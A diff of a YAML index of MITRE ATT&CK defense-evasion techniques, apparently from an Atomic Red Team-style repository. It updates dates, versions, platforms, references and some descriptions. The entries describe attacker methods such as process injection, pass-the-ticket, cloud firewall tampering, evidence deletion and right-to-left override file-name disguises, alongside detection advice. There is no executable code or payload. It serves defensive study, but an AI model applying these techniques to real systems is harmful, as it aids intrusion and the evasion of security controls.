+      modified: '2023-03-15T18:43:20.995Z'
       name: 'Abuse Elevation Control Mechanism: Setuid and Setgid'
       description: |-
         An adversary may abuse configurations where an application has the setuid or setgid bits set in order to get code running in a different (and possibly more privileged) user’s context. On Linux or macOS, when the setuid or setgid bits are set for an application binary, the application will run with the privileges of the owning user or group respectively.(Citation: setuid man page) Normally an application is run in the current user’s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them may not have the specific required privileges.
@@ -6333,7 +6459,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1548.001
     atomic_tests: []
   T1218.008:
@@ -6369,7 +6494,7 @@ defense-evasion:
         description: 'Giagone, R., Bermejo, L., and Yarochkin, F. (2017, November
           20). Cobalt Strikes Again: Spam Runs Use Macros and CVE-2017-8759 Exploit
           Against Russian Banks. Retrieved March 7, 2019.'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T18:52:49.877Z'
       name: 'Signed Binary Proxy Execution: Odbcconf'
       description: "Adversaries may abuse odbcconf.exe to proxy execution of malicious
         payloads. Odbcconf.exe is a Windows utility that allows you to configure Open
@@ -6402,13 +6527,11 @@ defense-evasion:
       - Application control
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1218.008
     atomic_tests: []
   T1548.005:
     technique:
-      modified: '2024-03-28T15:30:09.313Z'
+      modified: '2024-10-15T16:07:49.519Z'
       name: Temporary Elevated Cloud Access
       description: "Adversaries may abuse permission configurations that allow them
         to gain temporarily elevated access to cloud resources. Many cloud environments
@@ -6470,10 +6593,9 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - IaaS
-      - Azure AD
-      - Office 365
-      - Google Workspace
-      x_mitre_version: '1.1'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'User Account: User Account Modification'
       type: attack-pattern
@@ -6531,7 +6653,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1055.013:
     technique:
@@ -6573,7 +6694,7 @@ defense-evasion:
         description: Microsoft. (n.d.). PsSetCreateProcessNotifyRoutine routine. Retrieved
           December 20, 2017.
         source_name: Microsoft PsSetCreateProcessNotifyRoutine routine
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-02-09T15:43:48.848Z'
       name: Process Doppelgänging
       description: "Adversaries may inject malicious code into process via process
         doppelgänging in order to evade process-based defenses as well as possibly
@@ -6632,41 +6753,10 @@ defense-evasion:
       - Administrator
       - SYSTEM
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1578.003:
     technique:
-      x_mitre_platforms:
-      - IaaS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--70857657-bd0b-4695-ad3e-b13f92cac1b4
-      type: attack-pattern
-      created: '2020-06-16T17:23:06.508Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1578.003
-        url: https://attack.mitre.org/techniques/T1578/003
-      - source_name: Mandiant M-Trends 2020
-        url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
-        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
-          2020.
-      - source_name: AWS CloudTrail Search
-        url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
-        description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
-          Retrieved June 17, 2020.
-      - source_name: Azure Activity Logs
-        url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
-        description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17,
-          2020.
-      - source_name: Cloud Audit Logs
-        url: https://cloud.google.com/logging/docs/audit#admin-activity
-        description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-30T13:28:37.415Z'
       name: Delete Cloud Instance
       description: |-
         An adversary may delete a cloud instance after they have performed malicious activities in an attempt to evade detection and remove evidence of their presence.  Deleting an instance or virtual machine can remove valuable forensic artifacts and other evidence of suspicious behavior if the instance is not recoverable.
@@ -6675,20 +6765,50 @@ defense-evasion:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
+      x_mitre_contributors:
+      - Arun Seelagan, CISA
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         The deletion of a new instance or virtual machine is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities. For example, detecting a sequence of events such as the creation of an instance, mounting of a snapshot to that instance, and deletion of that instance by a new user account may indicate suspicious activity.
 
         In AWS, CloudTrail logs capture the deletion of an instance in the <code>TerminateInstances</code> event, and in Azure the deletion of a VM may be captured in Azure activity logs.(Citation: AWS CloudTrail Search)(Citation: Azure Activity Logs) Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of <code>gcloud compute instances delete</code> to delete a VM.(Citation: Cloud Audit Logs)
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - IaaS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Instance: Instance Metadata'
       - 'Instance: Instance Deletion'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--70857657-bd0b-4695-ad3e-b13f92cac1b4
+      created: '2020-06-16T17:23:06.508Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1578/003
+        external_id: T1578.003
+      - source_name: AWS CloudTrail Search
+        description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
+          Retrieved June 17, 2020.
+        url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
+      - source_name: Cloud Audit Logs
+        description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
+        url: https://cloud.google.com/logging/docs/audit#admin-activity
+      - source_name: Mandiant M-Trends 2020
+        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+          2020.
+        url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+      - source_name: Azure Activity Logs
+        description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17,
+          2020.
+        url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1574.005:
     technique:
@@ -6718,7 +6838,7 @@ defense-evasion:
         description: 'Stefan Kanthak. (2015, December 8). Executable installers are
           vulnerable^WEVIL (case 7): 7z*.exe allows remote code execution with escalation
           of privilege. Retrieved December 4, 2014.'
-      modified: '2020-10-27T14:49:39.188Z'
+      modified: '2020-03-26T19:20:23.030Z'
       name: Executable Installer File Permissions Weakness
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -6753,8 +6873,6 @@ defense-evasion:
       - Administrator
       - User
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1562.006:
     technique:
@@ -6845,12 +6963,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1562.006
     atomic_tests: []
   T1562.007:
     technique:
-      modified: '2023-04-15T00:25:36.502Z'
+      modified: '2024-10-16T19:38:57.374Z'
       name: Disable or Modify Cloud Firewall
       description: "Adversaries may disable or modify a firewall within a cloud environment
         to bypass controls that limit access to cloud resources. Cloud firewalls are
@@ -6858,19 +6975,25 @@ defense-evasion:
         Firewall](https://attack.mitre.org/techniques/T1562/004). \n\nCloud environments
         typically utilize restrictive security groups and firewall rules that only
         allow network activity from trusted IP addresses via expected ports and protocols.
-        An adversary may introduce new firewall rules or policies to allow access
-        into a victim cloud environment. For example, an adversary may use a script
-        or utility that creates new ingress rules in existing security groups to allow
-        any TCP/IP connectivity, or remove networking limitations to support traffic
-        associated with malicious activity (such as cryptomining).(Citation: Expel
-        IO Evil in AWS)(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials
-        2022)\n\nModifying or disabling a cloud firewall may enable adversary C2 communications,
-        lateral movement, and/or data exfiltration that would otherwise not be allowed."
+        An adversary with appropriate permissions may introduce new firewall rules
+        or policies to allow access into a victim cloud environment and/or move laterally
+        from the cloud control plane to the data plane. For example, an adversary
+        may use a script or utility that creates new ingress rules in existing security
+        groups (or creates new security groups entirely) to allow any TCP/IP connectivity
+        to a cloud-hosted instance.(Citation: Palo Alto Unit 42 Compromised Cloud
+        Compute Credentials 2022) They may also remove networking limitations to support
+        traffic associated with malicious activity (such as cryptomining).(Citation:
+        Expel IO Evil in AWS)(Citation: Palo Alto Unit 42 Compromised Cloud Compute
+        Credentials 2022)\n\nModifying or disabling a cloud firewall may enable adversary
+        C2 communications, lateral movement, and/or data exfiltration that would otherwise
+        not be allowed. It may also be used to open up resources for [Brute Force](https://attack.mitre.org/techniques/T1110)
+        or [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1499). "
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
       x_mitre_contributors:
       - Expel
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: Monitor cloud logs for modification or creation of new security
         groups or firewall rules.
@@ -6879,7 +7002,7 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - IaaS
-      x_mitre_version: '1.2'
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Firewall: Firewall Disable'
       - 'Firewall: Firewall Rule Modification'
@@ -6902,9 +7025,8 @@ defense-evasion:
         url: https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1036.002:
     technique:
@@ -6937,7 +7059,7 @@ defense-evasion:
         description: Firsh, A.. (2018, February 13). Zero-day vulnerability in Telegram
           - Cybercriminals exploited Telegram flaw to launch multipurpose attacks.
           Retrieved April 22, 2019.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-14T21:01:59.733Z'
       name: Right-to-Left Override
       description: |-
         Adversaries may abuse the right-to-left override (RTLO or RLO) character (U+202E) to disguise a string and/or file name to make it appear benign. RTLO is a non-printing Unicode character that causes the text that follows it to be displayed in reverse. For example, a Windows screensaver executable named <code>March 25 \u202Excod.scr</code> will display as <code>March 25 rcs.docx</code>. A JavaScript file named <code>photo_high_re\u202Egnp.js</code> will be displayed as <code>photo_high_resj.png</code>.(Citation: Infosecinstitute RTLO Technique)
@@ -6956,8 +7078,6 @@ defense-evasion:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'File: File Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1542.002:
     technique:
@@ -6988,7 +7108,7 @@ defense-evasion:
           health and make sure it's not already dying on you. Retrieved October 2,
           2018.
         source_name: ITWorld Hard Disk Health Dec 2014
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-01T20:43:55.632Z'
       name: Component Firmware
       description: |-
         Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://attack.mitre.org/techniques/T1542/001) but conducted upon other system components/devices that may not have the same capability or level of integrity checking.
@@ -7018,12 +7138,10 @@ defense-evasion:
       - SYSTEM
       x_mitre_system_requirements:
       - Ability to update component device firmware from the host operating system.
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1070:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:59:22.125Z'
       name: Indicator Removal on Host
       description: |-
         Adversaries may delete or modify artifacts generated within systems to remove evidence of their presence or hinder defenses. Various artifacts may be created by an adversary or something that can be attributed to an adversary’s actions. Typically these artifacts are used as defensive indicators related to monitored events, such as strings from downloaded files, logs that are generated from user actions, and other data analyzed by defenders. Location, format, and type of artifact (such as command or login history) are often specific to each platform.
@@ -7049,9 +7167,8 @@ defense-evasion:
       - Windows
       - Containers
       - Network
-      - Office 365
-      - Google Workspace
-      x_mitre_version: '2.1'
+      - Office Suite
+      x_mitre_version: '2.2'
       x_mitre_data_sources:
       - 'Scheduled Job: Scheduled Job Modification'
       - 'File: File Modification'
@@ -7082,14 +7199,13 @@ defense-evasion:
         external_id: T1070
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1070
     atomic_tests: []
   T1550.003:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-09-12T15:21:09.330Z'
       name: 'Use Alternate Authentication Material: Pass the Ticket'
       description: |-
         Adversaries may “pass the ticket” using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system.
@@ -7109,6 +7225,7 @@ defense-evasion:
       x_mitre_contributors:
       - Vincent Le Toux
       - Ryan Becwar
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Audit all Kerberos authentication and credential use events and review for discrepancies. Unusual remote authentication events that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity.
 
@@ -7116,7 +7233,6 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.1'
@@ -7132,34 +7248,35 @@ defense-evasion:
       id: attack-pattern--7b211ac6-c815-4189-93a9-ab415deca926
       created: '2020-01-30T17:03:43.072Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1550/003
         external_id: T1550.003
-      - source_name: ADSecurity AD Kerberos Attacks
-        description: Metcalf, S. (2014, November 22). Mimikatz and Active Directory
-          Kerberos Attacks. Retrieved June 2, 2016.
-        url: https://adsecurity.org/?p=556
-      - source_name: GentilKiwi Pass the Ticket
-        description: Deply, B. (2014, January 13). Pass the ticket. Retrieved June
-          2, 2016.
-        url: http://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
+      - source_name: CERT-EU Golden Ticket Protection
+        description: Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016,
+          April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.
+        url: https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
       - source_name: Campbell 2014
         description: Campbell, C. (2014). The Secret Life of Krbtgt. Retrieved December
           4, 2014.
         url: http://defcon.org/images/defcon-22/dc-22-presentations/Campbell/DEFCON-22-Christopher-Campbell-The-Secret-Life-of-Krbtgt.pdf
+      - source_name: GentilKiwi Pass the Ticket
+        description: Deply, B. (2014, January 13). Pass the ticket. Retrieved September
+          12, 2024.
+        url: https://web.archive.org/web/20210515214027/https://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
+      - source_name: ADSecurity AD Kerberos Attacks
+        description: Metcalf, S. (2014, November 22). Mimikatz and Active Directory
+          Kerberos Attacks. Retrieved June 2, 2016.
+        url: https://adsecurity.org/?p=556
       - source_name: Stealthbits Overpass-the-Hash
         description: Warren, J. (2019, February 26). How to Detect Overpass-the-Hash
           Attacks. Retrieved February 4, 2021.
         url: https://stealthbits.com/blog/how-to-detect-overpass-the-hash-attacks/
-      - source_name: CERT-EU Golden Ticket Protection
-        description: Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016,
-          April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.
-        url: https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1550.003
     atomic_tests: []
   T1036.004:
@@ -7225,7 +7342,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1036.004
     atomic_tests: []
   T1055.004:
@@ -7264,7 +7380,7 @@ defense-evasion:
           A Technical Survey Of Common And Trending Process Injection Techniques.
           Retrieved December 7, 2017.'
         source_name: Elastic Process Injection July 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:23:46.476Z'
       name: 'Process Injection: Asynchronous Procedure Call'
       description: "Adversaries may inject malicious code into processes via the asynchronous
         procedure call (APC) queue in order to evade process-based defenses as well
@@ -7313,8 +7429,6 @@ defense-evasion:
       x_mitre_defense_bypassed:
       - Application control
       - Anti-virus
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1055.004
     atomic_tests: []
   T1647:
@@ -7365,7 +7479,7 @@ defense-evasion:
         pairs to insert environment variables, such as <code>LSEnvironment</code>,
         to enable persistence via [Dynamic Linker Hijacking](https://attack.mitre.org/techniques/T1574/006).(Citation:
         wardle chp2 persistence)(Citation: eset_osx_flashback)"
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T22:00:33.375Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Plist File Modification
       x_mitre_detection: "Monitor for common command-line editors used to modify plist
@@ -7386,7 +7500,6 @@ defense-evasion:
       - 'File: File Modification'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1647
     atomic_tests: []
   T1553.005:
@@ -7453,7 +7566,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1553.005
     atomic_tests: []
   T1600.002:
@@ -7476,7 +7588,7 @@ defense-evasion:
         url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
         description: Omar Santos. (2020, October 19). Attackers Continue to Target
           Legacy Devices. Retrieved October 20, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-21T22:37:48.503Z'
       name: Disable Crypto Hardware
       description: |-
         Adversaries disable a network device’s dedicated hardware encryption, which may enable them to leverage weaknesses in software encryption in order to reduce the effort involved in collecting, manipulating, and exfiltrating transmitted data.
@@ -7497,8 +7609,6 @@ defense-evasion:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1542:
     technique:
@@ -7559,11 +7669,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1612:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-15T16:22:09.807Z'
       name: Build Image on Host
       description: "Adversaries may build a container image directly on a host to
         bypass defenses that monitor for the retrieval of malicious images from a
@@ -7628,7 +7737,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1612
     atomic_tests: []
   T1055.002:
@@ -7652,7 +7760,7 @@ defense-evasion:
           A Technical Survey Of Common And Trending Process Injection Techniques.
           Retrieved December 7, 2017.'
         source_name: Elastic Process Injection July 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:21:11.178Z'
       name: 'Process Injection: Portable Executable Injection'
       description: "Adversaries may inject portable executables (PE) into processes
         in order to evade process-based defenses as well as possibly elevate privileges.
@@ -7696,8 +7804,6 @@ defense-evasion:
       - Application control
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1055.002
     atomic_tests: []
   T1218.012:
@@ -7753,7 +7859,7 @@ defense-evasion:
         not account for its potential abuse.(Citation: LOLBAS Verclsid)(Citation:
         Red Canary Verclsid.exe)(Citation: BOHOPS Abusing the COM Registry)(Citation:
         Nick Tyrer GitHub) "
-      modified: '2022-10-25T14:00:00.188Z'
+      modified: '2022-05-20T17:35:28.221Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Verclsid
       x_mitre_detection: Use process monitoring to monitor the execution and arguments
@@ -7777,7 +7883,6 @@ defense-evasion:
       - Digital Certificate Validation
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1562.010:
     technique:
@@ -7868,40 +7973,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1562.010
     atomic_tests: []
   T1497:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - macOS
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Deloitte Threat Library Team
-      - Sunny Neo
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
-      type: attack-pattern
-      created: '2019-04-17T22:22:24.505Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1497
-        url: https://attack.mitre.org/techniques/T1497
-      - source_name: Deloitte Environment Awareness
-        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
-        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
-          May 18, 2021.
-      - source_name: Unit 42 Pirpi July 2015
-        url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
-        description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
-          on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
-          23, 2019.'
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-12T15:50:18.049Z'
       name: Virtualization/Sandbox Evasion
       description: |+
         Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)
@@ -7913,6 +7989,10 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_contributors:
+      - Deloitte Threat Library Team
+      - Sunny Neo
+      x_mitre_deprecated: false
       x_mitre_detection: Virtualization, sandbox, user activity, and related discovery
         techniques will likely occur in the first steps of an operation but may also
         occur throughout as an adversary learns the environment. Data and events should
@@ -7923,8 +8003,14 @@ defense-evasion:
         required. Monitoring for suspicious processes being spawned that gather a
         variety of system information or perform other forms of Discovery, especially
         in a short period of time, may aid in detection.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - macOS
+      - Linux
       x_mitre_version: '1.3'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Process: Process Creation'
@@ -7934,9 +8020,28 @@ defense-evasion:
       - Host forensic analysis
       - Signature-based detection
       - Static File Analysis
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
+      created: '2019-04-17T22:22:24.505Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1497
+        external_id: T1497
+      - source_name: Unit 42 Pirpi July 2015
+        description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
+          on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
+          23, 2019.'
+        url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
+      - source_name: Deloitte Environment Awareness
+        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+          September 13, 2024.
+        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1218.005:
     technique:
@@ -7989,7 +8094,7 @@ defense-evasion:
       - source_name: LOLBAS Mshta
         url: https://lolbas-project.github.io/lolbas/Binaries/Mshta/
         description: LOLBAS. (n.d.). Mshta.exe. Retrieved July 31, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T20:38:28.802Z'
       name: 'Signed Binary Proxy Execution: Mshta'
       description: "Adversaries may abuse mshta.exe to proxy execution of malicious
         .hta files and Javascript or VBScript through a trusted Windows utility. There
@@ -8027,68 +8132,72 @@ defense-evasion:
       - Digital Certificate Validation
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1218.005
     atomic_tests: []
   T1480:
     technique:
+      modified: '2024-06-07T14:30:23.491Z'
+      name: Execution Guardrails
+      description: |-
+        Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary’s campaign.(Citation: FireEye Kevin Mandia Guardrails) Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses.(Citation: FireEye Outlook Dec 2019)
+
